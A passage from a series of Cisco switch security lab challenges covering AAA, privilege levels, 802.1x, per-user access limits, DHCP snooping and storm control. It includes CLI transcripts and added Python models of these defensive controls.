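        # ERROR: try the next method in the list
    return False, trace                  # list exhausted: login fails


if __name__ == "__main__":
    down = {"radius_reachable": False}
    # 'login default group radius' with the server down: every login fails,
    # the local usernames included. This is the lockout case.
    print(authenticate(["group radius"], "fred", "bert", down))
    # 'login default group radius local' falls back to the local database.
    print(authenticate(["group radius", "local"], "fred", "bert", down))
    # A wrong RADIUS password is a FAIL, so local is never consulted.
    print(authenticate(["group radius", "local"], "anne", "wrong"))
```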

Cisco Switch Challenge 111


Outline
This challenge involves the configuration of a Tacacs+ server for commands.
Objectives
The objectives of this challenge are to:

Define AAA.
Define privileges.
Define command authorization for a Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# privilege ?
cns_connect_intf_config  CNS Connect Intf Info Mode
config-rtr-http          RTR HTTP raw request Configuration
configure                Global configuration mode
exec                     Exec mode
interface                Interface configuration mode
interface                Interface range configuration mode
ipenacl                  IP named extended access-list configuration mode
ipsnacl                  IP named simple access-list configuration mode
line                     Line configuration mode
mac-enacl                MAC named extended ACL configuration mode
map-class                Map class configuration mode
map-list                 Map list configuration mode
mstp_cfg                 MSTP configuration mode
null-interface           Null interface configuration mode
preauth                  AAA Preauth definitions
rtr                      RTR Entry Configuration
sg-radius                Radius Server-group Definition
sg-tacacs+               Tacacs+ Server-group Definition
template                 Template configuration mode
vc-class                 VC class configuration mode
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure
(config)# radius-server host 39.100.234.1
(config)# radius-server key krinkle
(config)# aaa authorization commands 0 default group tacacs+
(config)# aaa authorization commands 15 default group tacacs+
(config)# aaa authorization commands 7 default group tacacs+

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:


access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

NetworkSims.com

Create a temporary Access-List entry


Reset functions
Open a terminal connection
Turn off privileged commands
Disconnect an existing network connection
Turn on privileged commands
Exit from the EXEC
Description of the interactive help system
Lock the terminal
Log in as a particular user
Exit from the EXEC
Name an existing network connection
Send echo messages
Run command on remote switch
Resume an active network connection
Show running system information
Display information about terminal lines
Open a telnet connection
Set terminal line parameters
Trace route to destination
Open a tunnel connection
List active connections

298

Thus:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#

privilege
privilege
privilege
privilege
privilege
privilege

configure level 7 snmp-server host


configure level 7 snmp-server enable
configure level 7 snmp-server
exec level 7 ping
exec level 7 configure terminal
exec level 7 configure

moves these commands to Level 7. For example ping is a Level 1 command and is now a
Level 7, while the rest have moved from Level 15 to Level 7.
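As an added illustration (not part of the NetworkSims challenge), the following Python model of EXEC privilege levels applies the page's privilege commands and reports what a user at a given level may run. The command names and their default levels are taken from the listing above; the table layout, the longest-prefix lookup rule and the helper names are this example's own assumptions.

```python
# Added example (not from the NetworkSims challenge): a model of IOS EXEC
# privilege levels. It applies "privilege exec level N <command>" lines and
# answers which commands a user at a given level may run. Default levels for
# the commands come from the listing above; helper names are this example's own.
from typing import Dict, Iterable, Tuple

LEVEL0_CMDS = ("disable", "enable", "exit", "help", "logout")
LEVEL1_CMDS = (
    "access-enable", "clear", "connect", "disconnect", "lock", "login",
    "name-connection", "ping", "rcommand", "resume", "show", "systat",
    "telnet", "terminal", "traceroute", "tunnel", "where",
)

CmdTable = Dict[Tuple[str, ...], int]   # command words -> required level


def default_exec_table() -> CmdTable:
    """Default EXEC table: Level 0 and Level 1 commands as listed on the page;
    anything else (for example 'configure terminal') is a Level 15 command."""
    table: CmdTable = {(c,): 0 for c in LEVEL0_CMDS}
    table.update({(c,): 1 for c in LEVEL1_CMDS})
    table[("configure",)] = 15
    table[("configure", "terminal")] = 15
    return table


def apply_privilege_lines(table: CmdTable, config_lines: Iterable[str]) -> CmdTable:
    """Apply 'privilege exec level N <command...>' lines to the table.
    'privilege configure ...' lines affect config mode, which this EXEC-only
    model does not track, so they are skipped."""
    for line in config_lines:
        words = line.split("#", 1)[-1].split()      # drop a leading "(config)#"
        if len(words) >= 5 and words[:3] == ["privilege", "exec", "level"]:
            table[tuple(words[4:])] = int(words[3])
    return table


def required_level(table: CmdTable, command: str) -> int:
    """Level needed for 'command'. The longest matching prefix wins, so
    'configure terminal' is looked up before plain 'configure', and
    'show running-config' falls back to the level set for 'show'.
    Unknown commands default to Level 15."""
    words = tuple(command.split())
    for n in range(len(words), 0, -1):
        if words[:n] in table:
            return table[words[:n]]
    return 15


def can_run(table: CmdTable, user_level: int, command: str) -> bool:
    return user_level >= required_level(table, command)


def allowed_commands(table: CmdTable, user_level: int) -> list:
    """Every command in the table that a user at user_level may run, sorted."""
    return sorted(" ".join(w) for w, lvl in table.items() if user_level >= lvl)


# The challenge's own commands, as constructed input lines.
PAGE_CONFIG = [
    "(config)# privilege configure level 7 snmp-server host",
    "(config)# privilege configure level 7 snmp-server enable",
    "(config)# privilege configure level 7 snmp-server",
    "(config)# privilege exec level 7 ping",
    "(config)# privilege exec level 7 configure terminal",
    "(config)# privilege exec level 7 configure",
]

if __name__ == "__main__":
    t = apply_privilege_lines(default_exec_table(), PAGE_CONFIG)
    for lvl in (1, 7, 15):
        print(f"level {lvl}: {allowed_commands(t, lvl)}")
```

The point the model makes explicit is that raising ping to Level 7 takes it away from Level 1 users, while Level 7 users gain configure terminal without needing Level 15.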

Cisco Switch Challenge 112


Outline
This challenge involves enabling 802.1x authentication.
Objectives
The objectives of this challenge are to:

Define AAA
Enable 802.1x.
Define re-authentication.

Example
> en
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# dot1x ?
  default           Configure Dot1x with default values for this port
  host-mode         Set the Host mode for 802.1x on this interface
  max-req           Max No.of Retries
  port-control      set the port-control value
  reauthentication  Enable or Disable Reauthentication for this port
  timeout           Various Timeouts
(config-if)# dot1x port-control ?
  auto                PortState will be set to AUTO
  force-authorized    PortState set to Authorized
  force-unauthorized  PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# dot1 reauthentication ?
  <cr>
(config-if)# dot1x re-authentication
(config-if)# dot1 timeout ?
  quiet-period    QuietPeriod in Seconds
  reauth-period   Time after which an automatic re-authentication should be initiated
  server-timeout  Timeout for Radius Retries
  supp-timeout    Timeout for Supplicant retries
  tx-period       Timeout for Supplicant Re-transmissions
(config-if)# dot1x timeout reauth-period ?
  <1-65535>  Enter a value between 1 and 65535
(config-if)# dot1x timeout reauth-period 180

Cisco Switch Challenge 113


Outline
This challenge involves enabling 802.1x authentication with authentication from an AAA
server.
Objectives
The objectives of this challenge are to:

Enable AAA.
Define the Radius server.
Enable 802.1x.
Define re-authentication.
Define Dot1x timeouts.

The commands used are:


(config)# aaa new-model
(config)# aaa accounting connection default start-stop group radius
(config)# aaa accounting network default start-stop group radius
(config)# aaa authentication dot1x default group radius local
(config)# dot1x system-auth-control
(config)# radius-server host 10.0.0.1 auth-port 1812 key test
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# dot1x port-control auto
(config-if)# dot1x re-authentication
(config-if)# dot1x timeout reauth-period 180
(config-if)# dot1x timeout tx-period 40
(config-if)# dot1x timeout quiet-period 10
(config-if)# dot1x max-req 3

Example
> en
# config t
(config)# aaa new-model

(config)# aaa authen dot1x ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication dot1x default ?
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
  none        NO authentication.
(config)# aaa authentication dot1x default group ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa authentication dot1x default group radius local
(config)# aaa accounting network ?
  WORD     Named Accounting list.
  default  The default accounting list.
(config)# aaa accounting network default ?
  none        No accounting.
  start-stop  Record start and stop without waiting
  stop-only   Record stop when service terminates.
  wait-start  Same as start-stop but wait for start-record commit.
(config)# aaa accounting network d star ?
  group  Use Server-group
(config)# aaa accounting net d star g ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa accounting network default start-stop group radius
(config)# aaa accounting connection ?
  WORD     Named Accounting list.
  default  The default accounting list.
(config)# aaa accounting connection default ?
  none        No accounting.
  start-stop  Record start and stop without waiting
  stop-only   Record stop when service terminates.
  wait-start  Same as start-stop but wait for start-record commit.
(config)# aaa accounting connection default start-stop ?
  group  Use Server-group
(config)# aaa accounting connection default start-stop group ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa accounting connection default start-stop group radius ?
  group  Use Server-group
  <cr>
(config)# aaa accounting connection default start-stop group radius


(config)# dot1x ?
  system-auth-control  Enable or Disable SysAuthControl
(config)# dot1x system-auth-control
(config)# radius-server host ?
  Hostname or A.B.C.D  IP address of RADIUS server
(config)# radius-server host 10.0.0.1 ?
  acct-port     UDP port for RADIUS accounting server (default is 1646)
  alias         1-8 aliases for this server (max. 8)
  auth-port     UDP port for RADIUS authentication server (default is 1645)
  backoff       Retry backoff pattern (Default is retransmits with constant delay)
  key           per-server encryption key (overrides default)
  non-standard  Parse attributes that violate the RADIUS standard
  retransmit    Specify the number of retries to active server (overrides default)
  timeout       Time to wait for this RADIUS server to reply (overrides default)
  <cr>
(config)# radius-server host 10.0.0.1 au ?
  <0-65536>  Port number
(config)# radius-server host 10.0.0.1 au 1812 ?
  acct-port     UDP port for RADIUS accounting server (default is 1813)
  auth-port     UDP port for RADIUS authentication server (default is 1812)
  key           per-server encryption key (overrides default)
  non-standard  Parse attributes that violate the RADIUS standard
  retransmit    Specify the number of retries to active server (overrides default)
  timeout       Time to wait for this RADIUS server to reply (overrides default)
  <cr>
(config)# radius-server host 10.0.0.1 auth-port 1812 key ?
  LINE  Text for this server's key
(config)# radius-server host 10.0.0.1 auth-port 1812 key test
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# dot1x ?
  default           Configure Dot1x with default values for this port
  host-mode         Set the Host mode for 802.1x on this interface
  max-req           Max No.of Retries
  port-control      set the port-control value
  reauthentication  Enable or Disable Reauthentication for this port
  timeout           Various Timeouts
(config-if)# dot1x port-control auto
(config-if)# dot1x re-authentication
(config-if)# dot1x timeout ?
  quiet-period    QuietPeriod in Seconds
  reauth-period   Time after which an automatic re-authentication should be initiated
  server-timeout  Timeout for Radius Retries
  supp-timeout    Timeout for Supplicant retries
  tx-period       Timeout for Supplicant Re-transmissions
(config-if)# dot1x timeout reauth-period 180
(config-if)# dot1x timeout tx-period 40
(config-if)# dot1x timeout quiet-period 10
(config-if)# dot1 max-req ?
  <1-10>  Enter a value between 1 and 10
(config-if)# dot1x max-req 3

Cisco Switch Challenge 114


Outline
This challenge involves the configuration of security of a switch.
Objectives
The objectives of this challenge are to:

Define usernames and passwords.
Define privilege levels.
Restrict access of users to a single host.

Example
> enable
# config t
(config)# username fred password bert
(config)# username test nopassword
(config)# username fred privilege 15
(config)# username test privilege 1
(config)# username test user-maxlinks 2
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:

  access-enable    Create a temporary Access-List entry
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  ping             Send echo messages
  rcommand         Run command on remote switch
  resume           Resume an active network connection
  show             Show running system information
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections

Thus:
(config)# username fred privilege 15
(config)# username test privilege 1

sets the maximum privilege level for fred at 15, while test will only be able to enter the
non-privileged mode. Also:
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

restricts the access for fred to a single host (192.168.0.1), so that the user will not be able to
log in from any other host. The following:
(config)# username test user-maxlinks 2

restricts the number of connections for test to two.
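The three restrictions above (privilege level, access-class and user-maxlinks) can be checked against a login attempt with the following Python model. It is an added example, not part of the NetworkSims challenge: the parser accepts only the username and access-list forms used on the page, the session bookkeeping is constructed, and the class and function names are this example's own.

```python
# Added example (not from the NetworkSims challenge): a model of the three
# per-user restrictions configured above: privilege level, access-class and
# user-maxlinks. The parser accepts the 'username ...' and
# 'access-list N permit host A.B.C.D' forms used on the page only; the class
# and function names are this example's own and the session state is constructed.
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class UserPolicy:
    privilege: int = 1                   # IOS default for a new username
    access_class: Optional[int] = None   # standard ACL number, if any
    max_links: Optional[int] = None      # user-maxlinks, if any
    active_links: int = 0                # constructed session state


Users = Dict[str, UserPolicy]
Acls = Dict[int, list]                   # ACL number -> permitted host addresses


def build_policy(config_lines) -> Tuple[Users, Acls]:
    """Read the page's 'username' and 'access-list ... permit host' lines."""
    users: Users = {}
    acls: Acls = {}
    for line in config_lines:
        w = line.split("#", 1)[-1].split()      # drop a leading "(config)#"
        if w[:1] == ["username"] and len(w) >= 2:
            pol = users.setdefault(w[1], UserPolicy())
            if len(w) >= 4:
                if w[2] == "privilege":
                    pol.privilege = int(w[3])
                elif w[2] == "access-class":
                    pol.access_class = int(w[3])
                elif w[2] == "user-maxlinks":
                    pol.max_links = int(w[3])
            # 'password' / 'nopassword' set credentials, not access limits
        elif len(w) >= 5 and w[0] == "access-list" and w[2:4] == ["permit", "host"]:
            acls.setdefault(int(w[1]), []).append(ipaddress.ip_address(w[4]))
    return users, acls


def login_allowed(users: Users, acls: Acls, name: str, src_ip: str) -> Tuple[bool, str]:
    """Decide whether 'name' may open a session from src_ip, and say why not."""
    pol = users.get(name)
    if pol is None:
        return False, "unknown user"
    if pol.access_class is not None:
        # A standard ACL ends with an implicit deny, so a source that is not
        # listed in any permit line is refused.
        if ipaddress.ip_address(src_ip) not in acls.get(pol.access_class, []):
            return False, f"{src_ip} not permitted by access-class {pol.access_class}"
    if pol.max_links is not None and pol.active_links >= pol.max_links:
        return False, f"user-maxlinks {pol.max_links} reached"
    return True, f"ok, privilege {pol.privilege}"


def open_session(users: Users, acls: Acls, name: str, src_ip: str) -> bool:
    """login_allowed plus bookkeeping of the user's active sessions."""
    ok, _ = login_allowed(users, acls, name, src_ip)
    if ok:
        users[name].active_links += 1
    return ok


# The challenge's own commands, as constructed input lines.
PAGE_CONFIG = [
    "(config)# username fred password bert",
    "(config)# username test nopassword",
    "(config)# username fred privilege 15",
    "(config)# username test privilege 1",
    "(config)# username test user-maxlinks 2",
    "(config)# access-list 9 permit host 192.168.0.1",
    "(config)# username fred access-class 9",
]

if __name__ == "__main__":
    users, acls = build_policy(PAGE_CONFIG)
    for name, ip in (("fred", "192.168.0.1"), ("fred", "10.0.0.5"), ("test", "10.0.0.5")):
        print(name, ip, login_allowed(users, acls, name, ip))
```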

Cisco Switch Challenge 115


Outline
This challenge involves the configuration of security of a switch.
Objectives
The objectives of this challenge are to:

Define Tacacs+.
Define accounting for start and stop events.

Example

> enable
# config t
(config)# aaa new-model
(config)# aaa account network default start-stop group tacacs+
(config)# aaa account reverse-access default group tacacs+

Cisco Switch Challenge 116


Outline
This challenge involves the configuration of security of a switch based on 802.1x.
Objectives
The objectives of this challenge are to:

Define AAA.
Define port authentication.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication dot1x default group radius
(config)# int fa0/1
(config-if)# dot1x ?
  default           Configure Dot1x with default values for this port
  guest-vlan        Configure Guest-vlan on this interface
  host-mode         Set the Host mode for 802.1x on this interface
  max-req           Max No.of Retries
  port-control      set the port-control value
  reauthentication  Enable or Disable Reauthentication for this port
  timeout           Various Timeouts
(config-if)# dot1 port-control ?
  auto                PortState will be set to AUTO
  force-authorized    PortState set to Authorized
  force-unauthorized  PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# int fa0/2
(config-if)# dot1x port-control auto
(config-if)# int fa0/4
(config-if)# dot1x port-control auto
(config-if)# exit
(config)# exit
# sh dot1x all
Sysauthcontrol                    = Disabled
Dot1x Protocol Version            = 1
Dot1x Oper Controlled Directions  = Both
Dot1x Admin Controlled Directions = Both
# sh dot1x all
Dot1x Info for interface FastEthernet0/1
----------------------------------------------------
Supplicant MAC <Not Applicable>
AuthSM State      = N/A
BendSM State      = N/A
PortStatus        = N/A
MaxReq            = 2
HostMode          = Single
Port Control      = Auto
QuietPeriod       = 60 Seconds
Re-authentication = Disabled
ReAuthPeriod      = 3600 Seconds
ServerTimeout     = 30 Seconds
SuppTimeout       = 30 Seconds
TxPeriod          = 30 Seconds
Guest-Vlan        = 0
# sh dot1x stat interface fa0/1
PortStatistics Parameters for Dot1x
--------------------------------------------
TxReqId = 0
TxReq = 0
TxTotal = 0
RxStart = 0
RxLogoff = 0
RxRespId = 0
RxResp = 0
RxInvalid = 0
RxLenErr = 0
RxTotal = 0
RxVersion = 0
LastRxSrcMac 0000.0000.0000
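Note that the show dot1x all output above reports Sysauthcontrol = Disabled: the ports were set to port-control auto, but the global dot1x system-auth-control command (issued in Challenge 113) was not, so 802.1x is not actually enforced on them. The following Python checker, an added example that is not part of the NetworkSims challenge, reads configuration lines written the way the page shows them and flags that gap together with the AAA prerequisites. The function names and the finding texts are this example's own; the two input lists are the commands of Challenges 116 and 113 as constructed input.

```python
# Added example (not from the NetworkSims challenge): an audit of 802.1x
# settings in CLI lines written the way the page shows them. It flags ports
# set to 'dot1x port-control auto' while the global 'dot1x system-auth-control'
# is missing (the Sysauthcontrol = Disabled case shown above), plus the AAA
# prerequisites. Function names and finding texts are this example's own.
from typing import Dict, List, Tuple

Ports = Dict[str, Dict[str, object]]


def parse_dot1x_config(config_lines) -> Tuple[Dict[str, bool], Ports]:
    """Collect global flags and per-interface 802.1x settings."""
    glob = {"aaa_new_model": False, "auth_list": False, "sysauthcontrol": False}
    ports: Ports = {}
    cur = None
    for line in config_lines:
        w = line.split("#", 1)[-1].split()      # drop "(config)#" / "(config-if)#"
        if not w:
            continue
        if w[:2] == ["aaa", "new-model"]:
            glob["aaa_new_model"] = True
        elif w[:3] == ["aaa", "authentication", "dot1x"]:
            glob["auth_list"] = True
        elif w[:2] == ["dot1x", "system-auth-control"]:
            glob["sysauthcontrol"] = True
        elif w[0] in ("int", "interface") and len(w) > 1:
            cur = ports.setdefault(w[1], {})
        elif cur is not None and w[:2] == ["dot1x", "port-control"] and len(w) > 2:
            cur["port-control"] = w[2]
        elif cur is not None and w[:2] == ["dot1x", "re-authentication"]:
            cur["reauth"] = True
        elif cur is not None and w[:2] == ["switchport", "mode"] and len(w) > 2:
            cur["mode"] = w[2]
    return glob, ports


def audit_dot1x(config_lines) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    glob, ports = parse_dot1x_config(config_lines)
    auto = [p for p, c in ports.items() if c.get("port-control") == "auto"]
    findings: List[str] = []
    if auto and not glob["sysauthcontrol"]:
        findings.append("dot1x system-auth-control missing: port-control auto on "
                        + ", ".join(auto) + " is not enforced")
    if auto and not glob["auth_list"]:
        findings.append("no 'aaa authentication dot1x' method list configured")
    if not glob["aaa_new_model"]:
        findings.append("aaa new-model missing")
    for p in auto:
        if ports[p].get("mode") != "access":
            findings.append(f"{p}: port-control auto without 'switchport mode access'")
        if not ports[p].get("reauth"):
            findings.append(f"{p}: re-authentication not enabled")
    return findings


# Challenge 116's lines and Challenge 113's lines, as constructed input.
CHALLENGE_116 = [
    "(config)# aaa new-model",
    "(config)# aaa authentication dot1x default group radius",
    "(config)# int fa0/1",
    "(config-if)# dot1x port-control auto",
    "(config-if)# int fa0/2",
    "(config-if)# dot1x port-control auto",
    "(config-if)# int fa0/4",
    "(config-if)# dot1x port-control auto",
]
CHALLENGE_113 = [
    "(config)# aaa new-model",
    "(config)# aaa authentication dot1x default group radius local",
    "(config)# dot1x system-auth-control",
    "(config)# radius-server host 10.0.0.1 auth-port 1812 key test",
    "(config)# int fa0/1",
    "(config-if)# switchport mode access",
    "(config-if)# dot1x port-control auto",
    "(config-if)# dot1x re-authentication",
    "(config-if)# dot1x timeout reauth-period 180",
]

if __name__ == "__main__":
    for name, cfg in (("Challenge 116", CHALLENGE_116), ("Challenge 113", CHALLENGE_113)):
        print(name, audit_dot1x(cfg) or ["no findings"])
```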

Cisco Switch Challenge 117


Outline
This challenge involves enabling 802.1x authentication.
Objectives
The objectives of this challenge are to:

Enable 802.1x.
Define re-authentication.

Example
> en
# config t
(config)# int fa0/1
(config-if)# switchport mode access

(config-if)# dot1x ?
  default           Configure Dot1x with default values for this port
  host-mode         Set the Host mode for 802.1x on this interface
  max-req           Max No.of Retries
  port-control      set the port-control value
  reauthentication  Enable or Disable Reauthentication for this port
  timeout           Various Timeouts
(config-if)# dot1x port-control ?
  auto                PortState will be set to AUTO
  force-authorized    PortState set to Authorized
  force-unauthorized  PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# dot1 reauthentication ?
  <cr>
(config-if)# dot1x re-authentication
(config-if)# dot1 t ?
  quiet-period    QuietPeriod in Seconds
  reauth-period   Time after which an automatic re-authentication should be initiated
  server-timeout  Timeout for Radius Retries
  supp-timeout    Timeout for Supplicant retries
  tx-period       Timeout for Supplicant Re-transmissions
(config-if)# dot1 t r ?
  <1-65535>  Enter a value between 1 and 65535
(config-if)# dot1x timeout reauth-period 180

Cisco Switch Challenge 118


Outline
This challenge involves defending against an attacker depleting the DHCP pool using
DHCP snooping.
Objectives
The objectives of this challenge are to:

Enable DHCP snooping.
Apply DHCP snooping on an interface.

Example
> en
# config t
Switch(config)# ip dhcp ?
  conflict                   DHCP address conflict parameters
  database                   Configure DHCP database agents
  excluded-address           Prevent DHCP from assigning certain addresses
  limited-broadcast-address  Use all 1's broadcast address
  ping                       Specify ping parameters used by DHCP
  pool                       Configure DHCP address pools
  relay                      DHCP relay agent parameters
  smart-relay                Enable Smart Relay feature
  snooping                   DHCP Snooping
Switch(config)# ip dhcp snooping ?
  information  DHCP Snooping information
  vlan         DHCP Snooping vlan
  <cr>
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan ?
  <1-4094>  DHCP Snooping vlan first number
Switch(config)# ip dhcp snooping vlan 4
Switch(config)# int fa0/1
Switch(config-if)# ip dhcp ?
  snooping  DHCP Snooping
Switch(config-if)# ip dhcp snooping ?
  limit  DHCP Snooping limit
  trust  DHCP Snooping trust config
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# ip dhcp snooping limit ?
  rate  DHCP Snooping limit
Switch(config-if)# ip dhcp snooping limit rate ?
  <1-4294967294>  DHCP snooping rate limit
Switch(config-if)# ip dhcp snooping limit rate 30
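What the two interface-level settings do with DHCP traffic is shown by the following Python model, an added example that is not part of the NetworkSims challenge. On a snooped VLAN, server messages (OFFER, ACK, NAK) arriving on an untrusted port are dropped, and a port that exceeds its per-second limit is err-disabled, which is what keeps a flood of DISCOVER messages from draining the pool. The class and function names are this example's own, the second port fa0/2 is a constructed client-facing port, and the packets are constructed.

```python
# Added example (not from the NetworkSims challenge): a model of the DHCP
# snooping controls configured above, 'trust' and 'limit rate'. Server replies
# (OFFER/ACK/NAK) on an untrusted port are dropped, and a port exceeding its
# per-second rate limit is err-disabled. Class and function names are this
# example's own; the sample packets are constructed.
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SERVER_MESSAGES = {"OFFER", "ACK", "NAK"}   # legitimately sent only by a server


@dataclass
class SnoopPort:
    name: str
    trusted: bool = False                  # untrusted is the default
    rate_limit: Optional[int] = None       # DHCP packets per second; None = unlimited
    err_disabled: bool = False
    seen: Dict[int, int] = field(default_factory=dict)   # second -> packets counted


class DhcpSnooping:
    def __init__(self, vlans):
        self.vlans = set(vlans)
        self.ports: Dict[str, SnoopPort] = {}
        self.log: List[str] = []

    def configure(self, config_lines) -> None:
        """Apply 'ip dhcp snooping vlan N', 'ip dhcp snooping trust' and
        'ip dhcp snooping limit rate N' as written on the page."""
        cur: Optional[SnoopPort] = None
        for line in config_lines:
            w = line.split("#", 1)[-1].split()
            if w[:4] == ["ip", "dhcp", "snooping", "vlan"] and len(w) > 4:
                self.vlans.add(int(w[4]))
            elif w[:1] == ["int"] and len(w) > 1:
                cur = self.ports.setdefault(w[1], SnoopPort(w[1]))
            elif w[:4] == ["ip", "dhcp", "snooping", "trust"] and cur:
                cur.trusted = True
            elif w[:5] == ["ip", "dhcp", "snooping", "limit", "rate"] and cur and len(w) > 5:
                cur.rate_limit = int(w[5])

    def handle(self, port_name: str, vlan: int, msg_type: str, second: int) -> str:
        """Return 'forward', or the reason the DHCP packet is dropped."""
        if vlan not in self.vlans:
            return "forward"                # snooping not enabled on this VLAN
        port = self.ports.setdefault(port_name, SnoopPort(port_name))
        if port.err_disabled:
            return "drop: port err-disabled"
        if port.rate_limit is not None:
            count = port.seen.get(second, 0) + 1
            port.seen[second] = count
            if count > port.rate_limit:
                port.err_disabled = True
                self.log.append(f"{port_name}: {port.rate_limit} pps exceeded, err-disabled")
                return "drop: rate limit exceeded"
        if msg_type in SERVER_MESSAGES and not port.trusted:
            self.log.append(f"{port_name}: {msg_type} from untrusted port dropped")
            return "drop: server message on untrusted port"
        return "forward"


# The page's commands plus one constructed, untrusted client-facing port.
PAGE_CONFIG = [
    "Switch(config)# ip dhcp snooping",
    "Switch(config)# ip dhcp snooping vlan 4",
    "Switch(config)# int fa0/1",
    "Switch(config-if)# ip dhcp snooping trust",
    "Switch(config-if)# ip dhcp snooping limit rate 30",
    "Switch(config)# int fa0/2",                      # constructed, not on the page
    "Switch(config-if)# ip dhcp snooping limit rate 30",
]


def build() -> DhcpSnooping:
    snoop = DhcpSnooping(vlans=[])
    snoop.configure(PAGE_CONFIG)
    return snoop


if __name__ == "__main__":
    s = build()
    print(s.handle("fa0/1", 4, "OFFER", 0), s.handle("fa0/2", 4, "OFFER", 0))
    print([s.handle("fa0/2", 4, "DISCOVER", 1) for _ in range(31)][-1], s.log)
```

In the page's example the same port is both trusted and rate-limited; in practice the trusted port is the one facing the DHCP server or uplink, and the rate limit is what matters on client-facing ports.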

Cisco Switch Challenge 119


Outline
This challenge involves setting up storm control.
Objectives
The objectives of this challenge are to:

Enable storm control.

Example
> enable
Switch# config t
Switch(config)# int vlan 1
Switch(config-vlan)# ip address 1.2.3.4 255.0.0.0
Switch(config-vlan)# exit
Switch(config)# int fa0/1
Switch(config-if)# storm-control ?
  broadcast  Broadcast address storm control
  multicast  Multicast address storm control
  unicast    Unicast address storm control
Switch(config-if)# storm-control multicast ?
  level  Set storm suppression level on this interface
Switch(config-if)# storm-control multicast level ?
  <0 - 100>  Enter Integer part of level as percentage of bandwidth
Switch(config-if)# storm-control multicast level 50
Switch(config-if)# exit
Switch(config)# exit
Switch# sh storm
Interface  Filter State  Level    Current
---------  ------------  -------  -------
Fa0/1      inactive      100.00%  N/A
Fa0/2      inactive      100.00%  N/A
Fa0/3      inactive      100.00%  N/A
Fa0/4      inactive      100.00%  N/A
Fa0/5      inactive      100.00%  N/A
Fa0/6      inactive      100.00%  N/A
Fa0/7      inactive      100.00%  N/A
Fa0/8      inactive      100.00%  N/A
Fa0/9      inactive      100.00%  N/A
Fa0/10     inactive      100.00%  N/A
Fa0/11     inactive      100.00%  N/A
Fa0/12     inactive      100.00%  N/A
Fa0/13     inactive      100.00%  N/A
Fa0/14     inactive      100.00%  N/A
Fa0/15     inactive      100.00%  N/A
Fa0/16     inactive      100.00%  N/A
Fa0/17     inactive      100.00%  N/A
Fa0/18     inactive      100.00%  N/A
Fa0/19     inactive      100.00%  N/A
Fa0/20     inactive      100.00%  N/A
Fa0/21     inactive      100.00%  N/A
Fa0/22     inactive      100.00%  N/A
Fa0/23     inactive      100.00%  N/A
Fa0/24     inactive      100.00%  N/A
Gi0/1      inactive      100.00%  N/A
Gi0/2      inactive      100.00%  N/A
Switch# sh storm multi
Interface  Filter State  Level    Current
---------  ------------  -------  -------
Fa0/1      Forwarding    50.00%   0.00%
Fa0/2      inactive      100.00%  N/A
Fa0/3      inactive      100.00%  N/A
Fa0/4      inactive      100.00%  N/A
Fa0/5      inactive      100.00%  N/A
Fa0/6      inactive      100.00%  N/A
Fa0/7      inactive      100.00%  N/A
Fa0/8      inactive      100.00%  N/A
Fa0/9      inactive      100.00%  N/A
Fa0/10     inactive      100.00%  N/A
Fa0/11     inactive      100.00%  N/A
Fa0/12     inactive      100.00%  N/A
Fa0/13     inactive      100.00%  N/A
Fa0/14     inactive      100.00%  N/A
Fa0/15     inactive      100.00%  N/A
Fa0/16     inactive      100.00%  N/A
Fa0/17     inactive      100.00%  N/A
Fa0/18     inactive      100.00%  N/A
Fa0/19     inactive      100.00%  N/A
Fa0/20     inactive      100.00%  N/A
Fa0/21     inactive      100.00%  N/A
Fa0/22     inactive      100.00%  N/A
Fa0/23     inactive      100.00%  N/A
Fa0/24     inactive      100.00%  N/A
Gi0/1      inactive      100.00%  N/A
Gi0/2      inactive      100.00%  N/A
Switch# sh stor fa0/1 m
Interface  Filter State  Level    Current
---------  ------------  -------  -------
Fa0/1      Forwarding    50.00%   0.00%

Cisco Switch Challenge 120


